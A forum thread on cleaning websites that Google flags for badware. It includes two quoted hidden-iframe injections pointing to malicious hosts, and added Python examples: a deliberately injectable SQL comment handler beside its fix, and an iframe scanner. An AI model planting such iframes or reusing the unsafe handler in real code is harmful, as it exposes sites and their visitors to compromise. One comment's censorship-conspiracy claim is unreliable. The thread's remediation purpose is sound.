Help! YOUR site has been flagged by Google as suspicious
by beckerist
about 5 years ago

Help! Google has listed your (my) site as suspicious!

I’m seeing an influx of these on this board, so I thought I’d take the time to show YOU how to figure this out on your own. Note, these instructions are for intermediate to expert webmasters. If you do not know what an .htaccess file is, what SQL injection means or what chmod does, I suggest you open a new Google tab and start learning some definitions! NOTE: EVERYONE IS ENCOURAGED TO LEARN!!!

A. Why is my site being flagged?
1. Google’s fault
2. Hosting provider's fault
3. My fault
4. Most likely…
B. How do I remove the badness?
1. Research
2. Identifying
3. Removing
4. Preventing
5. Rule of thumb — knowledge is power
C. How do I get back into Google’s good graces?
1. Links

A. Why is my site being flagged?

— Short answer: chances are you have badware on your site. This is not always the case though.

1. Google’s fault: On Saturday, January 31st 2009, during the wee hours of the early morn’, every single webpage (searchable through Google) contained badware! In reality, Google has since explained that they updated the list of suspicious sites and inadvertently included a wild card entry, flagging the whole Internet. It was resolved about 45 minutes later.

2. Hosting provider's fault: In my personal experience, this accounts for roughly 20% of all cases I’ve come across. This can manifest itself in a few different ways. Your hosting provider:
- has old/outdated/buggy/insecure code "pre-packaged" for your site
- has not properly secured their own servers
- has gullible tech-support
The ways to resolve this all involve either contacting your provider OR switching providers. The first is resolved easily by sending a list of the buggy/outdated software (for instance: phpBB2 vs. phpBB3) to them, with maybe links to the newest versions. If the company cares about security, they will hop right on it!
The second is again up to you (in a way.) If their servers are not secure, they probably aren’t even aware of it. Once you’ve figured out what your site is infected with (see B1-2) you can inform your provider with these details. A big deterrent to reporting these issues is "eh, someone else will do it" or "I’m sure they’ll fix it." If they don’t know, tell them! If you use a completely hosted service (something like blogspot for instance) and THEY have buggy software, again all you can do is report.
The last issue is something that is unfortunately unavoidable. I recommend researching each provider BEFORE purchasing their services. There have been reported cases of "hacker calls tech support, claims to be someone else (like a government official or RIAA lawyer), tech support is either scared, stupid, or maybe just naive and does something with the power they have to disrupt YOUR service."
It happens, it’s annoying, but if this is what happened you should be able to find out quickly. All customer service departments world-wide record or at least transcribe the details of every call.

3. My fault: Chances are, the reason you have badware is because of something YOU did. Say you install a CMS. In the installation process you are required to chmod some files to 777 so that they may be written to a static file. Upon finishing the installation you forget to delete the installation folder or chmod. You have left a file (full of settings AND with full writable and executable rights to EVERYONE) on your server. It isn’t a big stretch for Mrs. Hacker to append some code to the beginning of the file forcing your entire site to redirect to hers.

4. Most likely: it’s a combination of 1 and 2. Web servers and hosting providers follow the rule just like everything else: freedom and security are exclusive. The more freedom you give your webmasters, the less secure your system becomes. By allowing you to install buggy code, and by not preventing bad code from being executed, the hosting providers are essentially giving you the freedom (vs. security of NOT) to open their systems up to this badware. If they didn’t though, there are plenty of other providers out there you could turn to to meet your demands! It’s a catch-22, and as a result we unfortunately (fortunately?) have to deal with badware.

B. How do I remove the badness?

— Short answer: research, identification, removal and prevention!

1. Research: There are plenty of places you can visit to determine what is wrong with your site. Personally I use Google for just about every single step! The first step of the research is already done if you’ve seen your site flagged through a web search. You know that something is wrong. The next step is knowing where to turn to figure out exactly what that is.
2. Identifying: First, I suggest you go here:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.yoursite.com/the_page_that’s_infected.html
This will show you all the pages on your site that are affected as well as MORE information that is relevant to figuring out what’s wrong. Take note of the websites that your users might be redirected to, as well as the websites that are executing malicious code.
The next step I take from here is to plug those sites (more than 1 at a time) into Google and see if anyone else has experienced this particular variation. Chances are you’re not the first, and if you’re lucky a resolution might already have been posted! If not, it’s time to move to the "manual removal" section.
Other links to help you determine what the issue might be:
http://www.unmaskparasites.com/security-report/?page=http://www.yoursite.com/the_page_that’s_infected.html (if it’s up)
http://stopbadware.org/home/reportsearch?searchtext=http://www.yoursite.com/the_page_that’s_infected.html

3. Removal: Manual removal of these baddies can come in a few different flavors. The most important thing to know is where to look.
A) A lot of hijackings occur through the manipulation of config files on the server. Know what software your web server is running! If it’s Apache, you will need to check your http.conf file, your .htaccess file(s) and your .htusers files for any anomalies. If you don’t know how to do this, I again suggest using Google to look it up! If you are using IIS make sure there are no unknown modules and no strange users. Other web servers most likely will have some sort of setup AND some sort of execution. Make sure in all instances to work your way through all the possible areas of execution on your server (can be found on Google.)
B) More hijackings can occur through the manipulation of your database! Using SQL injection methods, hackers can insert ANY plain-text code (i.e. JavaScript) into a page that just blindly posts and reads without any sort of security. If you have written a script where you use a GET variable directly in an SQL query, anyone with a bit of know-how can do WHATEVER THEY WANT in your database. Say you have a blog with comments, and the comments are not secure… someone could either post a comment OR just go to the posting URL in their web browser with the appropriate code, and as a result can put malicious code into your site. If you use a database, check that too for any anomalies. Most DB engines have a search function. Use it to look for the sites you found listed on the Safebrowsing Google page.
C) This is the easiest one: simply use your editor (FrontPage, Dreamweaver, etc.) to "get" your entire site, and search through your local files for any instances of those pages, again found on the SB Google page.

4. Prevention: Dealing with each of the categories listed in #3, there are a few things you can do:
A) Make sure that the server hosting your web pages is secure! Have your hosting provider TELL you when the last time they ran Windows Updates was. Verify the version numbers of the scripts you are running (bulletin boards, etc…) are the MOST up to date. Things are upgraded for a reason, and the main reason is generally security! If they aren’t, talk to your hosting provider as it only helps them too.
B) Make sure that the scripts YOU write are secure. Research possible SQL injection methods, use strong passwords, and NEVER TRUST ANYONE. Even if you and only you know about a secret script that isn’t secure on your website doesn’t mean it will stay that way. Lock everything down, even if it’s not exactly convenient. There are always secure ways of doing what you need to do.
C) Be pro-active. Look at your pages, scour through every piece of them. Know your sites! Prevention can only fully happen if you KNOW how the offense occurred. If you don’t, then you need to dive deeper into your pages because someone else certainly has.

5. Rule of thumb: Knowledge is power. If you learn ANYTHING from this please share! The more people that know, the harder it makes it for the hackers.

C. How do I get back into Google’s good graces?
1. Links: http://www.google.com/support/webmasters/bin/answer.py?answer=35843

So that’s it! I hope you can take something from this, but as always feel free to post your questions on Badwarebusters.org
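The unsafe comment handler that section B.3(B) warns about, beside its parameterized form, plus the "search your database for the listed sites" step from the same section, as an added example in Python with SQLite (not beckerist's code). The comments table, the seeded rows and the badsite.example domain are constructed placeholders.

```python
import sqlite3

# Constructed sample rows standing in for a blog's comment table. The second row
# carries the kind of hidden iframe the post describes; the domain is a placeholder.
SEED_COMMENTS = [
    (1, "Nice write-up, thanks."),
    (1, '<iframe src="http://badsite.example/?click=X" width=1 height=1 '
        'style="visibility:hidden"></iframe>'),
    (2, "Does this also apply to phpBB3?"),
]


def setup_db():
    """In-memory SQLite database with a comments table seeded from SEED_COMMENTS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, post_id INTEGER, body TEXT)")
    conn.executemany("INSERT INTO comments (post_id, body) VALUES (?, ?)", SEED_COMMENTS)
    conn.commit()
    return conn


def add_comment_unsafe(conn, post_id, body):
    """The pattern the post warns about: a request value pasted straight into SQL.
    Any quote inside 'body' becomes part of the statement instead of the data."""
    sql = "INSERT INTO comments (post_id, body) VALUES (%s, '%s')" % (post_id, body)
    conn.execute(sql)
    conn.commit()


def add_comment_safe(conn, post_id, body):
    """Fixed form: placeholders let the driver send the text as data, never as SQL."""
    conn.execute("INSERT INTO comments (post_id, body) VALUES (?, ?)", (post_id, body))
    conn.commit()


def find_injected_comments(conn, indicators):
    """The post's 'search your DB' step: look for the hosts listed on the Safe Browsing
    diagnostic page and for the hidden-iframe shape. Returns matching (id, post_id)."""
    clauses = ["body LIKE ?"] * (len(indicators) + 1)
    params = ["%" + host + "%" for host in indicators] + ["%<iframe%visibility:hidden%"]
    query = "SELECT id, post_id FROM comments WHERE " + " OR ".join(clauses)
    return conn.execute(query, params).fetchall()


def unsafe_breaks_on_quote(conn, body="O'Reilly's tip worked"):
    """Demonstration helper: True if the unsafe handler fails on an ordinary apostrophe,
    which is the same mechanism an attacker's crafted value abuses."""
    try:
        add_comment_unsafe(conn, 2, body)
        return False
    except sqlite3.OperationalError:
        return True
```

The apostrophe case is the benign symptom of the defect: a plain comment breaks the concatenated statement, while the parameterized version stores it verbatim.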

by erica
about 5 years ago

WOW, this is a great resource page – Thanks for taking the time to create this!

Erica

by anirban
about 5 years ago

Awesome Info.. will go along way in helping people :-)

-Anirban

by denis
about 5 years ago

Great post!

I have an addition to the Prevention section:

D) Beware of spyware on your local computer. Trojans can steal your passwords and do whatever they want with your site.

Denis – www.UnmaskParasites.com

by beckerist
about 5 years ago

Good call. I will be posting more of these in the next few weeks. So far I have 2 started (just outlines so far): one discussing spyware prevention on your personal local computer, and another discussing methods of HOW spyware is built, to give individuals a sense of what to expect, what to look for and how to anticipate it.

The other topics I will probably discuss include "Using a virtual image to analyze badware," "Where on the internet should you report [XXXXXXX]," and "badware vs. spyware vs. (good and bad) adware vs. shareware"

by zaaylo
about 5 years ago

Great link suggested... really gonna help me a lot.
Thanks Denis

by Mackos
about 5 years ago

beckerist, they have to stick your post on the top of this website!
Great post, probably thanks to this one my website will be unflagged :)

by Cometcom1
about 5 years ago

Hi Mackos,

The posting has been flagged by the moderators, and I agree it is a great post.

There ought to be much more information like this available through the site resources – imho.

This is the kind of information that really helps, though I’d personally rewrite the contents slightly for better readability. – I’m confident that this information will not be lost and eventually be incorporated into the site as a valuable resource.

by davidhartley
about 5 years ago

A good post, but I’m noticing a pattern of apparent right-wing censorship taking place under the DISGUISE of “malware” … “protection”
It is a typical fascist technique, to send in some “terrorist” to soften up “the public” so that the fascists’ extreme transgressions against freedom, liberty, “net neutrality,” freedom of information, etc … can be swept under the rug & ignored.

Organic Consumers Associations and Judicial Watch are two sites which have been ATTACKED BY BOGUS “badware” reports and blacklisted in google.

Seeing that badware.org is associated with HARVARD — the home of Skull & Bones cronyism does little to dilute the appearance of right-wing conspiracy.

by acosonic
about 5 years ago

Hi guys, all websites on my hosting reseller account were hacked, due to shared hosting etc…

Here is which code I found inside them:
<iframe src=\”http://xtrarobotz.com/?click=7B934CB\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
and <iframe src=\”http://goooogleadsence.biz/?click=176CCDA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>

I’ve done a little php code which crawls through all subfolders you run it in and cleans that malicious code; you can grab it from
http://acosonic.com/archives/162/has-your-website-beign-blocked-by-google/
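A scanner for the injected tag shape quoted in the post above, as an added example in Python; it is not acosonic's PHP script from the linked page. SAMPLE_PAGE and the .example domains are constructed, and scan_tree assumes you are running it against a downloaded copy of the site, as section B.3(C) of the first post suggests.

```python
import re
from pathlib import Path

# Constructed sample page: one legitimate embed plus two injected 1x1 hidden iframes.
# The second injected tag uses the backslash-escaped quoting as it appears in the post
# above. All domains are placeholders, not real indicators.
SAMPLE_PAGE = """<html><body><p>Welcome to my site</p>
<iframe src="http://maps.example/embed" width=400 height=300></iframe>
<iframe src="http://injected.example/?click=ABC123" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src=\\"http://hidden.example/x\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe>", re.IGNORECASE | re.DOTALL)
# src value; tolerates an optional backslash and quote before the URL.
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?(https?://[^"'\\\s>]+)""", re.IGNORECASE)
ONE_PX = r"""%s\s*=\s*\\?["']?1\b"""  # width=1 / height=1 in any quoting style

def is_hidden_iframe(tag):
    """True for the injection shape: 1x1 size, or hidden outright via inline CSS."""
    t = tag.lower()
    tiny = re.search(ONE_PX % "width", t) and re.search(ONE_PX % "height", t)
    css = t.replace(" ", "")
    return bool(tiny or "visibility:hidden" in css or "display:none" in css)

def find_hidden_iframes(text):
    """Return (offset, src_url) for every hidden iframe found in a file's contents."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        if is_hidden_iframe(m.group(0)):
            src = SRC_RE.search(m.group(0))
            hits.append((m.start(), src.group(1) if src else None))
    return hits

def strip_hidden_iframes(text):
    """Remove only the hidden iframes; a visible, legitimate embed is left alone."""
    return IFRAME_RE.sub(lambda m: "" if is_hidden_iframe(m.group(0)) else m.group(0), text)

def scan_tree(root, clean=False, exts=(".html", ".htm", ".php", ".js")):
    """Walk a local copy of the site; report hits per file and, with clean=True,
    strip them after saving an untouched .bak copy of each infected file."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = find_hidden_iframes(text)
        if hits:
            report[str(path)] = hits
            if clean:  # the .bak keeps the exact original bytes for later analysis
                path.with_name(path.name + ".bak").write_bytes(path.read_bytes())
                path.write_text(strip_hidden_iframes(text), encoding="utf-8")
    return report
```

Run scan_tree("/path/to/site/copy") first to review the list of src hosts it reports against the Safe Browsing diagnostic page; only then rerun with clean=True.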

by tarosic
almost 5 years ago

This may have been the case 3 months ago, however, Denis is right.
At this point, almost every case I see of maliciously flagged sites comes from the iframe injection that has made its presence felt on the internet recently.

When this infection hits a site it has a 99.9% probability that it is in fact your fault.
Do you use a browser that allows pop-ups, or javascript?
Do you use a virus scanner that’s free? Or that hasn’t been updated recently? Or that has terrible heuristic results in comparison tests?
Are you running Microsoft Windows?
All of these can drastically increase the chances that you will be affected by a virus or exploit that can cause a compromise of your website.
Yes, sometimes hosting providers and Google make errors, but if that was happening all the time, they wouldn’t be able to stay in business.

If you have a script that you’re running, get the RSS feed for new updates and update it frequently.

Take backups, lots of them.

Most hosting where you share an account has some level of virtualizing a private system where you don’t interact with the other accounts.
This means that most of the time, their accounts cannot interact with yours at all.

And be Proactive about protecting your site.
Once Google has blacklisted it, you’re already behind the curve.
Ask your host how you can protect your site better, they will have specific recommendations that are unique to the hosting that you have with them.

by seomum
almost 5 years ago

Hi, I need very urgent help.

Problem facing: Google says “distributing badware” etc.

Website url: http://www.bhutantourpackage.com

Date detected: on 21st of May

Details: on 21st of May, only some of my pages were shown by Google as “distributing malware”, but on 22nd of May Google started showing it for the entire website.

I have been trying to figure out what the problem is for the last 24 hours but still couldn’t get it.

Let me tell you what I have done so far:

1. I have deleted that existing web hosting A/C and got a new hosting A/C, and uploaded all the files there.

2. Saw the source code of the downloaded files, but I can’t see any newly injected or badware-providing code on my entire website.

3. I checked each and every page of the site, but there is nowhere I can find the code in the source code.

So please let me know how to find that problem. For urgent help you can mail me as well: [email protected]

regards,
Arshad

by Cometcom1
almost 5 years ago

@seomum

I think you will find that one of your script files has been compromised and additional code inserted. This code is likely obfuscated so that it is hard to read for a human, but easy to execute by a computer.

Use Google Webmaster Tool to get page references for the page which contained the detected malicious script and also use this tool to request review once the script has been removed.

by dynamicnet
almost 5 years ago

I’m troubled by #2 – Hosting providers fault – on the foundation some providers secure their servers well, but allow their customers to install their own software for which the customers need to keep up to date. Add various web site infections due to infected personal computers that have site access, and you have even very secure hosts vulnerable… is it still the hosting providers fault?

by beckerist
almost 5 years ago

Not really. Again it boils down to freedom vs security. If they are not keeping their own provided applications updated, then yes, it is their fault. If they allow you to upload EVERYTHING then it’s your responsibility to make sure it’s clean before it goes up. Keep your Anti-virus program up to date, and make sure to study anything suspicious.

by Typhon
over 4 years ago

Actually, if they were actually familiar with Google and common ISP policies, this article would likely not have been written.

by Typhon
over 4 years ago

Ya know, I honestly find this all funny. Here are my reasons why, based on some of the responses.
1) It’s Google’s fault
I’d love a better explanation than technobabble about something that Google does not do, as it would be bad for their business to do it in the first place. Also, if it was Google, the Google logo and redirect to fix it would go to Google. That’s also their standard policy from day 1.

2) It’s my fault.
All I did was click the URL, and all my loggers and such tell me nothing has changed. So how is that my fault for going to the same site time and time again, only to have it suddenly blocked, and not by Google but by you guys?

3) It’s the ISP’s fault
Well, let’s look at ISP standard procedure for blocking a site.
Did I tell them to block a site… nope.
Did I tell them to turn the parental locks on… nope.
Did I tell them to block the site for me in any way… nope.
As it’s standard ISP policy to only block sites that I tell them to, and all my answers to those questions are no, I don’t see how this is possible.

So sadly I don’t see how any of this article helps, other than the fact that it’s NOT Google, me or an ISP blocking the site, it’s you guys. So please stop trying to justify yourselves, as well as blame others. It doesn’t look good for you guys and it’s definitely not good for business.

by beckerist
over 4 years ago

It might help if your response were coherent. Instead of complaining, why don’t YOU write a constructive article?

by Kaleh
over 4 years ago

@Typhon

So sadly I don’t see how any of this article helps, other than the fact that it’s NOT Google, me or an ISP blocking the site, it’s you guys. So please stop trying to justify yourselves, as well as blame others. It doesn’t look good for you guys and it’s definitely not good for business.

I think you may have misunderstood the role of BadwareBusters/StopBadware in relation to sites, in the Google search results, being flagged as suspicious.

Google flags sites in their search results as suspicious, not BadwareBusters/StopBadware.

http://stopbadware.org/home/faq#partnerwarnings-involved
How and why is StopBadware.org involved in Google’s warnings?
Google independently checks the web for badware and badware-linking code, and places warnings in its own search results. StopBadware’s role is to help site owners who want to remove the warnings to learn about badware and website security. StopBadware also administers an independent review process through which a website owner can request the removal of a warning.

Although Google’s warning pages contain a link to the StopBadware.org site for more information, the decision to post a warning page is an independent decision made by Google, not by StopBadware, and does not reflect any testing or review by us in advance.
